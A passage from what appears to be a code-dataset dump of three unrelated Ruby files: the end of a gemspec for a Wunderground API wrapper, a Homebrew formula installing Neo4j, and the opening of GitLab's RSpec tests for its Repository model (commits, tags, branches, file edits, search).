s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Winfred Nadeau"]
s.date = "2014-02-11"
s.description = "A simple ruby API wrapper for interacting with the Wunderground API"
s.email = "[email protected]"
s.extra_rdoc_files = [
"LICENSE.txt",
"README.markdown"
]
s.files = [
"Gemfile",
"LICENSE.txt",
"README.markdown",
"Rakefile",
"VERSION",
"lib/wunderground.rb",
"test/helper.rb",
"test/test_wunderground.rb",
"wunderground.gemspec",
"wunderground_ruby.gemspec"
]
s.homepage = "http://github.com/wnadeau/wunderground_ruby"
s.licenses = ["MIT"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.23"
s.summary = "A simple ruby API wrapper for interacting with the Wunderground API"
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<json>, ["> 1.4.0"])
s.add_runtime_dependency(%q<httparty>, ["> 0.6.0"])
s.add_runtime_dependency(%q<addressable>, [">= 0"])
s.add_development_dependency(%q<shoulda>, [">= 0"])
s.add_development_dependency(%q<bundler>, [">= 0"])
s.add_development_dependency(%q<jeweler>, [">= 0"])
s.add_development_dependency(%q<simplecov>, [">= 0"])
s.add_development_dependency(%q<mocha>, ["> 0.9.11"])
s.add_development_dependency(%q<pry>, [">= 0"])
else
s.add_dependency(%q<json>, ["> 1.4.0"])
s.add_dependency(%q<httparty>, ["> 0.6.0"])
s.add_dependency(%q<addressable>, [">= 0"])
s.add_dependency(%q<shoulda>, [">= 0"])
s.add_dependency(%q<bundler>, [">= 0"])
s.add_dependency(%q<jeweler>, [">= 0"])
s.add_dependency(%q<simplecov>, [">= 0"])
s.add_dependency(%q<mocha>, ["> 0.9.11"])
s.add_dependency(%q<pry>, [">= 0"])
end
else
s.add_dependency(%q<json>, ["> 1.4.0"])
s.add_dependency(%q<httparty>, ["> 0.6.0"])
s.add_dependency(%q<addressable>, [">= 0"])
s.add_dependency(%q<shoulda>, [">= 0"])
s.add_dependency(%q<bundler>, [">= 0"])
s.add_dependency(%q<jeweler>, [">= 0"])
s.add_dependency(%q<simplecov>, [">= 0"])
s.add_dependency(%q<mocha>, ["> 0.9.11"])
s.add_dependency(%q<pry>, [">= 0"])
end
end
| 35.094595 | 105 | 0.615325 |
213cff9381185122cf2cd5efec0533bfffa08287 | 2,775 | class Neo4j < Formula
desc "Robust (fully ACID) transactional property graph database"
homepage "https://neo4j.com/"
url "https://neo4j.com/artifact.php?name=neo4j-community-4.1.0-unix.tar.gz"
sha256 "b598edeb3401e5ec40fb7bc3370307addfcaa21565f731016c9c7f8e70af659a"
bottle :unneeded
# Upstream does not intend to provide Java 8+ support until 4.0
# and there are various issues with running against newer Javas.
# https://github.com/neo4j/neo4j/issues/11728#issuecomment-387038804
# https://github.com/neo4j/neo4j-browser/issues/671#issuecomment-346224754
# https://github.com/Homebrew/homebrew-core/issues/31090
# As of v4.1.0, neo4j still needs to build with java 1.8
# https://github.com/neo4j/neo4j/issues/12516
depends_on :java => "1.8"
def install
ENV["NEO4J_HOME"] = libexec
# Remove windows files
rm_f Dir["bin/*.bat"]
# Install jars in libexec to avoid conflicts
libexec.install Dir["*"]
# Symlink binaries
bin.install Dir["#{libexec}/bin/neo4j{,-shell,-import,-shared.sh,-admin}", "#{libexec}/bin/cypher-shell"]
bin.env_script_all_files(libexec/"bin", :NEO4J_HOME => ENV["NEO4J_HOME"])
# Adjust UDC props
# Suppress the empty, focus-stealing java gui.
(libexec/"conf/neo4j.conf").append_lines <<~EOS
wrapper.java.additional=-Djava.awt.headless=true
wrapper.java.additional.4=-Dneo4j.ext.udc.source=homebrew
dbms.directories.data=#{var}/neo4j/data
dbms.directories.logs=#{var}/log/neo4j
EOS
end
def post_install
(var/"log/neo4j").mkpath
(var/"neo4j").mkpath
end
plist_options :manual => "neo4j start"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<false/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/neo4j</string>
<string>console</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/neo4j.log</string>
<key>StandardOutPath</key>
<string>#{var}/log/neo4j.log</string>
</dict>
</plist>
EOS
end
test do
ENV["NEO4J_HOME"] = libexec
ENV["NEO4J_LOG"] = testpath/"libexec/data/log/neo4j.log"
ENV["NEO4J_PIDFILE"] = testpath/"libexec/data/neo4j-service.pid"
mkpath testpath/"libexec/data/log"
assert_match /Neo4j .*is not running/i, shell_output("#{bin}/neo4j status", 3)
end
end
| 33.433735 | 109 | 0.645405 |
ac69c1a667d93934bef958624b81191df6c638bd | 90,541 | # frozen_string_literal: true
require 'spec_helper'
describe Repository do
include RepoHelpers
include GitHelpers
TestBlob = Struct.new(:path)
let(:project) { create(:project, :repository) }
let(:repository) { project.repository }
let(:broken_repository) { create(:project, :broken_storage).repository }
let(:user) { create(:user) }
let(:git_user) { Gitlab::Git::User.from_gitlab(user) }
let(:message) { 'Test message' }
let(:merge_commit) do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project)
merge_commit_id = repository.merge(user,
merge_request.diff_head_sha,
merge_request,
message)
repository.commit(merge_commit_id)
end
let(:author_email) { '[email protected]' }
let(:author_name) { 'John Doe' }
def expect_to_raise_storage_error
expect { yield }.to raise_error do |exception|
storage_exceptions = [Gitlab::Git::CommandError, GRPC::Unavailable]
known_exception = storage_exceptions.select { |e| exception.is_a?(e) }
expect(known_exception).not_to be_nil
end
end
describe '#branch_names_contains' do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
subject { repository.branch_names_contains(sample_commit.id) }
it { is_expected.to include('master') }
it { is_expected.not_to include('feature') }
it { is_expected.not_to include('fix') }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.branch_names_contains(sample_commit.id)
end
end
end
end
describe '#tag_names_contains' do
subject { repository.tag_names_contains(sample_commit.id) }
it { is_expected.to include('v1.1.0') }
it { is_expected.not_to include('v1.0.0') }
end
describe 'tags_sorted_by' do
let(:tags_to_compare) { %w[v1.0.0 v1.1.0] }
context 'name_desc' do
subject { repository.tags_sorted_by('name_desc').map(&:name) & tags_to_compare }
it { is_expected.to eq(['v1.1.0', 'v1.0.0']) }
end
context 'name_asc' do
subject { repository.tags_sorted_by('name_asc').map(&:name) & tags_to_compare }
it { is_expected.to eq(['v1.0.0', 'v1.1.0']) }
end
context 'updated' do
let(:tag_a) { repository.find_tag('v1.0.0') }
let(:tag_b) { repository.find_tag('v1.1.0') }
context 'desc' do
subject { repository.tags_sorted_by('updated_desc').map(&:name) }
before do
double_first = double(committed_date: Time.now)
double_last = double(committed_date: Time.now - 1.second)
allow(tag_a).to receive(:dereferenced_target).and_return(double_first)
allow(tag_b).to receive(:dereferenced_target).and_return(double_last)
allow(repository).to receive(:tags).and_return([tag_a, tag_b])
end
it { is_expected.to eq(['v1.0.0', 'v1.1.0']) }
end
context 'asc' do
subject { repository.tags_sorted_by('updated_asc').map(&:name) }
before do
double_first = double(committed_date: Time.now - 1.second)
double_last = double(committed_date: Time.now)
allow(tag_a).to receive(:dereferenced_target).and_return(double_last)
allow(tag_b).to receive(:dereferenced_target).and_return(double_first)
allow(repository).to receive(:tags).and_return([tag_a, tag_b])
end
it { is_expected.to eq(['v1.1.0', 'v1.0.0']) }
end
context 'annotated tag pointing to a blob' do
let(:annotated_tag_name) { 'annotated-tag' }
subject { repository.tags_sorted_by('updated_asc').map(&:name) & (tags_to_compare + [annotated_tag_name]) }
before do
options = { message: 'test tag message\n',
tagger: { name: 'John Smith', email: '[email protected]' } }
rugged_repo(repository).tags.create(annotated_tag_name, 'a48e4fc218069f68ef2e769dd8dfea3991362175', options)
double_first = double(committed_date: Time.now - 1.second)
double_last = double(committed_date: Time.now)
allow(tag_a).to receive(:dereferenced_target).and_return(double_last)
allow(tag_b).to receive(:dereferenced_target).and_return(double_first)
end
it { is_expected.to eq(['v1.1.0', 'v1.0.0', annotated_tag_name]) }
after do
rugged_repo(repository).tags.delete(annotated_tag_name)
end
end
end
end
describe '#ref_name_for_sha' do
it 'returns the ref' do
allow(repository.raw_repository).to receive(:ref_name_for_sha)
.and_return('refs/environments/production/77')
expect(repository.ref_name_for_sha('bla', '0' * 40)).to eq 'refs/environments/production/77'
end
end
describe '#ref_exists?' do
context 'when ref exists' do
it 'returns true' do
expect(repository.ref_exists?('refs/heads/master')).to be true
end
end
context 'when ref does not exist' do
it 'returns false' do
expect(repository.ref_exists?('refs/heads/non-existent')).to be false
end
end
context 'when ref format is incorrect' do
it 'returns false' do
expect(repository.ref_exists?('refs/heads/invalid:master')).to be false
end
end
end
describe '#list_last_commits_for_tree' do
let(:path_to_commit) do
{
"encoding" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"files" => "570e7b2abdd848b95f2f578043fc23bd6f6fd24d",
".gitignore" => "c1acaa58bbcbc3eafe538cb8274ba387047b69f8",
".gitmodules" => "6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9",
"CHANGELOG" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"CONTRIBUTING.md" => "6d394385cf567f80a8fd85055db1ab4c5295806f",
"Gemfile.zip" => "ae73cb07c9eeaf35924a10f713b364d32b2dd34f",
"LICENSE" => "1a0b36b3cdad1d2ee32457c102a8c0b7056fa863",
"MAINTENANCE.md" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"PROCESS.md" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"README.md" => "1a0b36b3cdad1d2ee32457c102a8c0b7056fa863",
"VERSION" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"gitlab-shell" => "6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9",
"six" => "cfe32cf61b73a0d5e9f13e774abde7ff789b1660"
}
end
subject { repository.list_last_commits_for_tree(sample_commit.id, '.').id }
it 'returns the last commits for every entry in the current path' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.')
result.each do |key, value|
result[key] = value.id
end
expect(result).to include(path_to_commit)
end
it 'returns the last commits for every entry in the current path starting from the offset' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', offset: path_to_commit.size - 1)
expect(result.size).to eq(1)
end
it 'returns a limited number of last commits for every entry in the current path starting from the offset' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', limit: 1)
expect(result.size).to eq(1)
end
it 'returns an empty hash when offset is out of bounds' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', offset: path_to_commit.size)
expect(result.size).to eq(0)
end
context 'with a commit with invalid UTF-8 path' do
def create_commit_with_invalid_utf8_path
rugged = rugged_repo(repository)
blob_id = Rugged::Blob.from_buffer(rugged, "some contents")
tree_builder = Rugged::Tree::Builder.new(rugged)
tree_builder.insert({ oid: blob_id, name: "hello\x80world", filemode: 0100644 })
tree_id = tree_builder.write
user = { email: "[email protected]", time: Time.now, name: "John Cai" }
Rugged::Commit.create(rugged, message: 'some commit message', parents: [rugged.head.target.oid], tree: tree_id, committer: user, author: user)
end
it 'does not raise an error' do
commit = create_commit_with_invalid_utf8_path
expect { repository.list_last_commits_for_tree(commit, '.', offset: 0) }.not_to raise_error
end
end
end
describe '#last_commit_for_path' do
subject { repository.last_commit_for_path(sample_commit.id, '.gitignore').id }
it { is_expected.to eq('c1acaa58bbcbc3eafe538cb8274ba387047b69f8') }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.last_commit_id_for_path(sample_commit.id, '.gitignore')
end
end
end
end
describe '#last_commit_id_for_path' do
subject { repository.last_commit_id_for_path(sample_commit.id, '.gitignore') }
it "returns last commit id for a given path" do
is_expected.to eq('c1acaa58bbcbc3eafe538cb8274ba387047b69f8')
end
it "caches last commit id for a given path" do
cache = repository.send(:cache)
key = "last_commit_id_for_path:#{sample_commit.id}:#{Digest::SHA1.hexdigest('.gitignore')}"
expect(cache).to receive(:fetch).with(key).and_return('c1acaa5')
is_expected.to eq('c1acaa5')
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.last_commit_for_path(sample_commit.id, '.gitignore').id
end
end
end
end
describe '#commits' do
context 'when neither the all flag nor a ref are specified' do
it 'returns every commit from default branch' do
expect(repository.commits(nil, limit: 60).size).to eq(37)
end
end
context 'when ref is passed' do
it 'returns every commit from the specified ref' do
expect(repository.commits('master', limit: 60).size).to eq(37)
end
context 'when all' do
it 'returns every commit from the repository' do
expect(repository.commits('master', limit: 60, all: true).size).to eq(60)
end
end
context 'with path' do
it 'sets follow when it is a single path' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: true)).and_call_original.twice
repository.commits('master', limit: 1, path: 'README.md')
repository.commits('master', limit: 1, path: ['README.md'])
end
it 'does not set follow when it is multiple paths' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: false)).and_call_original
repository.commits('master', limit: 1, path: ['README.md', 'CHANGELOG'])
end
end
context 'without path' do
it 'does not set follow' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: false)).and_call_original
repository.commits('master', limit: 1)
end
end
end
context "when 'author' is set" do
it "returns commits from that author" do
commit = repository.commits(nil, limit: 1).first
known_author = "#{commit.author_name} <#{commit.author_email}>"
expect(repository.commits(nil, author: known_author, limit: 1)).not_to be_empty
end
it "doesn't returns commits from an unknown author" do
unknown_author = "The Man With No Name <[email protected]>"
expect(repository.commits(nil, author: unknown_author, limit: 1)).to be_empty
end
end
context "when 'all' flag is set" do
it 'returns every commit from the repository' do
expect(repository.commits(nil, all: true, limit: 60).size).to eq(60)
end
end
context "when 'order' flag is set" do
it 'passes order option to perform the query' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(order: 'topo')).and_call_original
repository.commits('master', limit: 1, order: 'topo')
end
end
end
describe '#new_commits' do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
subject { repository.new_commits(rev) }
context 'when there are no new commits' do
let(:rev) { repository.commit.id }
it 'returns an empty array' do
expect(subject).to eq([])
end
end
context 'when new commits are found' do
let(:branch) { 'orphaned-branch' }
let!(:rev) { repository.commit(branch).id }
it 'returns the commits' do
repository.delete_branch(branch)
expect(subject).not_to be_empty
expect(subject).to all( be_a(::Commit) )
expect(subject.size).to eq(1)
end
end
end
describe '#commits_by' do
let_it_be(:project) { create(:project, :repository) }
let(:oids) { TestEnv::BRANCH_SHA.values }
subject { project.repository.commits_by(oids: oids) }
it 'finds each commit' do
expect(subject).not_to include(nil)
expect(subject.size).to eq(oids.size)
end
it 'returns only Commit instances' do
expect(subject).to all( be_a(Commit) )
end
context 'when some commits are not found ' do
let(:oids) do
['deadbeef'] + TestEnv::BRANCH_SHA.each_value.first(10)
end
it 'returns only found commits' do
expect(subject).not_to include(nil)
expect(subject.size).to eq(10)
end
end
context 'when no oids are passed' do
let(:oids) { [] }
it 'does not call #batch_by_oid' do
expect(Gitlab::Git::Commit).not_to receive(:batch_by_oid)
subject
end
end
end
describe '#find_commits_by_message' do
it 'returns commits with messages containing a given string' do
commit_ids = repository.find_commits_by_message('submodule').map(&:id)
expect(commit_ids).to include(
'5937ac0a7beb003549fc5fd26fc247adbce4a52e',
'6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9',
'cfe32cf61b73a0d5e9f13e774abde7ff789b1660'
)
expect(commit_ids).not_to include('913c66a37b4a45b9769037c55c2d238bd0942d2e')
end
it 'is case insensitive' do
commit_ids = repository.find_commits_by_message('SUBMODULE').map(&:id)
expect(commit_ids).to include('5937ac0a7beb003549fc5fd26fc247adbce4a52e')
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.find_commits_by_message('s') }
end
end
end
describe '#blob_at' do
context 'blank sha' do
subject { repository.blob_at(Gitlab::Git::BLANK_SHA, '.gitignore') }
it { is_expected.to be_nil }
end
context 'regular blob' do
subject { repository.blob_at(repository.head_commit.sha, '.gitignore') }
it { is_expected.to be_an_instance_of(::Blob) }
end
context 'readme blob on HEAD' do
subject { repository.blob_at(repository.head_commit.sha, 'README.md') }
it { is_expected.to be_an_instance_of(::ReadmeBlob) }
end
context 'readme blob not on HEAD' do
subject { repository.blob_at(repository.find_branch('feature').target, 'README.md') }
it { is_expected.to be_an_instance_of(::Blob) }
end
end
describe '#merged_to_root_ref?' do
context 'merged branch without ff' do
subject { repository.merged_to_root_ref?('branch-merged') }
it { is_expected.to be_truthy }
end
# If the HEAD was ff then it will be false
context 'merged with ff' do
subject { repository.merged_to_root_ref?('improve/awesome') }
it { is_expected.to be_truthy }
end
context 'not merged branch' do
subject { repository.merged_to_root_ref?('not-merged-branch') }
it { is_expected.to be_falsey }
end
context 'default branch' do
subject { repository.merged_to_root_ref?('master') }
it { is_expected.to be_falsey }
end
context 'non merged branch' do
subject { repository.merged_to_root_ref?('fix') }
it { is_expected.to be_falsey }
end
context 'non existent branch' do
subject { repository.merged_to_root_ref?('non_existent_branch') }
it { is_expected.to be_nil }
end
end
describe "#root_ref_sha" do
let(:commit) { double("commit", sha: "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3") }
subject { repository.root_ref_sha }
before do
allow(repository).to receive(:commit).with(repository.root_ref) { commit }
end
it { is_expected.to eq(commit.sha) }
end
describe "#merged_branch_names", :clean_gitlab_redis_cache do
subject { repository.merged_branch_names(branch_names) }
let(:branch_names) { %w(test beep boop definitely_merged) }
let(:already_merged) { Set.new(["definitely_merged"]) }
let(:write_hash) do
{
"test" => Gitlab::Redis::Boolean.new(false).to_s,
"beep" => Gitlab::Redis::Boolean.new(false).to_s,
"boop" => Gitlab::Redis::Boolean.new(false).to_s,
"definitely_merged" => Gitlab::Redis::Boolean.new(true).to_s
}
end
let(:read_hash) do
{
"test" => Gitlab::Redis::Boolean.new(false).to_s,
"beep" => Gitlab::Redis::Boolean.new(false).to_s,
"boop" => Gitlab::Redis::Boolean.new(false).to_s,
"definitely_merged" => Gitlab::Redis::Boolean.new(true).to_s
}
end
let(:cache) { repository.send(:redis_hash_cache) }
let(:cache_key) { cache.cache_key(:merged_branch_names) }
before do
allow(repository.raw_repository).to receive(:merged_branch_names).with(branch_names).and_return(already_merged)
end
it { is_expected.to eq(already_merged) }
it { is_expected.to be_a(Set) }
describe "cache expiry" do
before do
allow(cache).to receive(:delete).with(anything)
end
it "is expired when the branches caches are expired" do
expect(cache).to receive(:delete).with(:merged_branch_names).at_least(:once)
repository.send(:expire_branches_cache)
end
it "is expired when the repository caches are expired" do
expect(cache).to receive(:delete).with(:merged_branch_names).at_least(:once)
repository.send(:expire_all_method_caches)
end
end
context "cache is empty" do
before do
cache.delete(:merged_branch_names)
end
it { is_expected.to eq(already_merged) }
describe "cache values" do
it "writes the values to redis" do
expect(cache).to receive(:write).with(:merged_branch_names, write_hash)
subject
end
it "matches the supplied hash" do
subject
expect(cache.read_members(:merged_branch_names, branch_names)).to eq(read_hash)
end
end
end
context "cache is not empty" do
before do
cache.write(:merged_branch_names, write_hash)
end
it { is_expected.to eq(already_merged) }
it "doesn't fetch from the disk" do
expect(repository.raw_repository).not_to receive(:merged_branch_names)
subject
end
end
context "cache is partially complete" do
before do
allow(repository.raw_repository).to receive(:merged_branch_names).with(["boop"]).and_return([])
hash = write_hash.except("boop")
cache.write(:merged_branch_names, hash)
end
it { is_expected.to eq(already_merged) }
it "does fetch from the disk" do
expect(repository.raw_repository).to receive(:merged_branch_names).with(["boop"])
subject
end
end
context "requested branches array is empty" do
let(:branch_names) { [] }
it { is_expected.to eq(already_merged) }
end
end
describe '#can_be_merged?' do
context 'mergeable branches' do
subject { repository.can_be_merged?('0b4bc9a49b562e85de7cc9e834518ea6828729b9', 'master') }
it { is_expected.to be_truthy }
end
context 'non-mergeable branches without conflict sides missing' do
subject { repository.can_be_merged?('bb5206fee213d983da88c47f9cf4cc6caf9c66dc', 'feature') }
it { is_expected.to be_falsey }
end
context 'non-mergeable branches with conflict sides missing' do
subject { repository.can_be_merged?('conflict-missing-side', 'conflict-start') }
it { is_expected.to be_falsey }
end
context 'submodule changes that confuse rugged' do
subject { repository.can_be_merged?('update-gitlab-shell-v-6-0-1', 'update-gitlab-shell-v-6-0-3') }
it { is_expected.to be_falsey }
end
end
describe '#commit' do
context 'when ref exists' do
it 'returns commit object' do
expect(repository.commit('master'))
.to be_an_instance_of Commit
end
end
context 'when ref does not exist' do
it 'returns nil' do
expect(repository.commit('non-existent-ref')).to be_nil
end
end
context 'when ref is not specified' do
it 'is using a root ref' do
expect(repository).to receive(:find_commit).with('master')
repository.commit
end
end
context 'when ref is not valid' do
context 'when preceding tree element exists' do
it 'returns nil' do
expect(repository.commit('master:ref')).to be_nil
end
end
context 'when preceding tree element does not exist' do
it 'returns nil' do
expect(repository.commit('non-existent:ref')).to be_nil
end
end
end
end
describe "#create_dir" do
it "commits a change that creates a new directory" do
expect do
repository.create_dir(user, 'newdir',
message: 'Create newdir', branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
newdir = repository.tree('master', 'newdir')
expect(newdir.path).to eq('newdir')
end
context "when committing to another project" do
let(:forked_project) { create(:project, :repository) }
it "creates a fork and commit to the forked project" do
expect do
repository.create_dir(user, 'newdir',
message: 'Create newdir', branch_name: 'patch',
start_branch_name: 'master', start_project: forked_project)
end.to change { repository.count_commits(ref: 'master') }.by(0)
expect(repository.branch_exists?('patch')).to be_truthy
expect(forked_project.repository.branch_exists?('patch')).to be_falsy
newdir = repository.tree('patch', 'newdir')
expect(newdir.path).to eq('newdir')
end
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.create_dir(user, 'newdir',
message: 'Add newdir',
branch_name: 'master',
author_email: author_email, author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#create_file" do
it 'commits new file successfully' do
expect do
repository.create_file(user, 'NEWCHANGELOG', 'Changelog!',
message: 'Create changelog',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
blob = repository.blob_at('master', 'NEWCHANGELOG')
expect(blob.data).to eq('Changelog!')
end
it 'creates new file and dir when file_path has a forward slash' do
expect do
repository.create_file(user, 'new_dir/new_file.txt', 'File!',
message: 'Create new_file with new_dir',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
expect(repository.tree('master', 'new_dir').path).to eq('new_dir')
expect(repository.blob_at('master', 'new_dir/new_file.txt').data).to eq('File!')
end
it 'respects the autocrlf setting' do
repository.create_file(user, 'hello.txt', "Hello,\r\nWorld",
message: 'Add hello world',
branch_name: 'master')
blob = repository.blob_at('master', 'hello.txt')
expect(blob.data).to eq("Hello,\nWorld")
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.create_file(user, 'NEWREADME', 'README!',
message: 'Add README',
branch_name: 'master',
author_email: author_email,
author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#update_file" do
it 'updates file successfully' do
expect do
repository.update_file(user, 'CHANGELOG', 'Changelog!',
message: 'Update changelog',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
blob = repository.blob_at('master', 'CHANGELOG')
expect(blob.data).to eq('Changelog!')
end
it 'updates filename successfully' do
expect do
repository.update_file(user, 'NEWLICENSE', 'Copyright!',
branch_name: 'master',
previous_path: 'LICENSE',
message: 'Changes filename')
end.to change { repository.count_commits(ref: 'master') }.by(1)
files = repository.ls_files('master')
expect(files).not_to include('LICENSE')
expect(files).to include('NEWLICENSE')
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.update_file(user, 'README', 'Updated README!',
branch_name: 'master',
previous_path: 'README',
message: 'Update README',
author_email: author_email,
author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#delete_file" do
it 'removes file successfully' do
expect do
repository.delete_file(user, 'README',
message: 'Remove README', branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
expect(repository.blob_at('master', 'README')).to be_nil
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.delete_file(user, 'README',
message: 'Remove README', branch_name: 'master',
author_email: author_email, author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "search_files_by_content" do
let(:results) { repository.search_files_by_content('feature', 'master') }
subject { results }
it { is_expected.to be_an Array }
it 'regex-escapes the query string' do
results = repository.search_files_by_content("test\\", 'master')
expect(results.first).not_to start_with('fatal:')
end
it 'properly handles an unmatched parenthesis' do
results = repository.search_files_by_content("test(", 'master')
expect(results.first).not_to start_with('fatal:')
end
it 'properly handles when query is not present' do
results = repository.search_files_by_content('', 'master')
expect(results).to match_array([])
end
it 'properly handles query when repo is empty' do
repository = create(:project, :empty_repo).repository
results = repository.search_files_by_content('test', 'master')
expect(results).to match_array([])
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.search_files_by_content('feature', 'master')
end
end
end
describe 'result' do
subject { results.first }
it { is_expected.to be_an String }
it { expect(subject.lines[2]).to eq("master:CHANGELOG\x00190\x00 - Feature: Replace teams with group membership\n") }
end
end
describe "search_files_by_name" do
let(:results) { repository.search_files_by_name('files', 'master') }
it 'returns result' do
expect(results.first).to eq('files/html/500.html')
end
it 'ignores leading slashes' do
results = repository.search_files_by_name('/files', 'master')
expect(results.first).to eq('files/html/500.html')
end
it 'properly handles when query is only slashes' do
results = repository.search_files_by_name('//', 'master')
expect(results).to match_array([])
end
it 'properly handles when query is not present' do
results = repository.search_files_by_name('', 'master')
expect(results).to match_array([])
end
it 'properly handles query when repo is empty' do
repository = create(:project, :empty_repo).repository
results = repository.search_files_by_name('test', 'master')
expect(results).to match_array([])
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.search_files_by_name('files', 'master') }
end
end
end
describe '#async_remove_remote' do
before do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('joe', 'remote_branch', masterrev)
end
context 'when worker is scheduled successfully' do
before do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('remote_name', 'remote_branch', masterrev)
allow(RepositoryRemoveRemoteWorker).to receive(:perform_async).and_return('1234')
end
it 'returns job_id' do
expect(repository.async_remove_remote('joe')).to eq('1234')
end
end
context 'when worker does not schedule successfully' do
before do
allow(RepositoryRemoveRemoteWorker).to receive(:perform_async).and_return(nil)
end
it 'returns nil' do
expect(Rails.logger).to receive(:info).with("Remove remote job failed to create for #{project.id} with remote name joe.")
expect(repository.async_remove_remote('joe')).to be_nil
end
end
end
describe '#fetch_ref' do
let(:broken_repository) { create(:project, :broken_storage).repository }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.fetch_ref(broken_repository, source_ref: '1', target_ref: '2')
end
end
end
end
describe '#get_raw_changes' do
context 'with non-UTF8 bytes in paths' do
let(:old_rev) { 'd0888d297eadcd7a345427915c309413b1231e65' }
let(:new_rev) { '19950f03c765f7ac8723a73a0599764095f52fc0' }
let(:changes) { repository.raw_changes_between(old_rev, new_rev) }
it 'returns the changes' do
expect { changes }.not_to raise_error
expect(changes.first.new_path.bytes).to eq("hello\x80world".bytes)
end
end
end
describe '#create_ref' do
it 'redirects the call to write_ref' do
ref, ref_path = '1', '2'
expect(repository.raw_repository).to receive(:write_ref).with(ref_path, ref)
repository.create_ref(ref, ref_path)
end
end
describe "#changelog", :use_clean_rails_memory_store_caching do
it 'accepts changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('changelog')])
expect(repository.changelog.path).to eq('changelog')
end
it 'accepts news instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('news')])
expect(repository.changelog.path).to eq('news')
end
it 'accepts history instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('history')])
expect(repository.changelog.path).to eq('history')
end
it 'accepts changes instead of changelog' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('changes')])
expect(repository.changelog.path).to eq('changes')
end
it 'is case-insensitive' do
expect(repository.tree).to receive(:blobs).and_return([TestBlob.new('CHANGELOG')])
expect(repository.changelog.path).to eq('CHANGELOG')
end
end
describe "#license_blob", :use_clean_rails_memory_store_caching do
before do
repository.delete_file(
user, 'LICENSE', message: 'Remove LICENSE', branch_name: 'master')
end
it 'handles when HEAD points to non-existent ref' do
repository.create_file(
user, 'LICENSE', 'Copyright!',
message: 'Add LICENSE', branch_name: 'master')
allow(repository).to receive(:root_ref).and_raise(Gitlab::Git::Repository::NoRepository)
expect(repository.license_blob).to be_nil
end
it 'looks in the root_ref only' do
repository.delete_file(user, 'LICENSE',
message: 'Remove LICENSE', branch_name: 'markdown')
repository.create_file(user, 'LICENSE',
Licensee::License.new('mit').content,
message: 'Add LICENSE', branch_name: 'markdown')
